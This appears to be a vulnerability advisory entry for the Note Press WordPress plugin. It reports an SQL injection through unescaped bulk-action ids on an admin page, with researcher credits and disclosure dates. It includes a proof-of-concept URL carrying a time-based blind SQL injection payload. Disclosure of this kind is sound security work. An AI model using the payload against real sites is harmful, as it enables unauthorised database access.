The plugin does not sanitise and escape the ids from the bulk actions before using them in a SQL statement in an admin page, leading to an SQL injection
https;//example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&_wpnonce=e4ee1ce89d&action=delete&paged=1&id%5B%5D=18+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)&id%5B%5D=19&action2=delete
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Daniel Krohmer
Yes
2022-05-09 (about 1 years ago)
2022-05-12 (about 1 years ago)
2022-05-14 (about 1 years ago)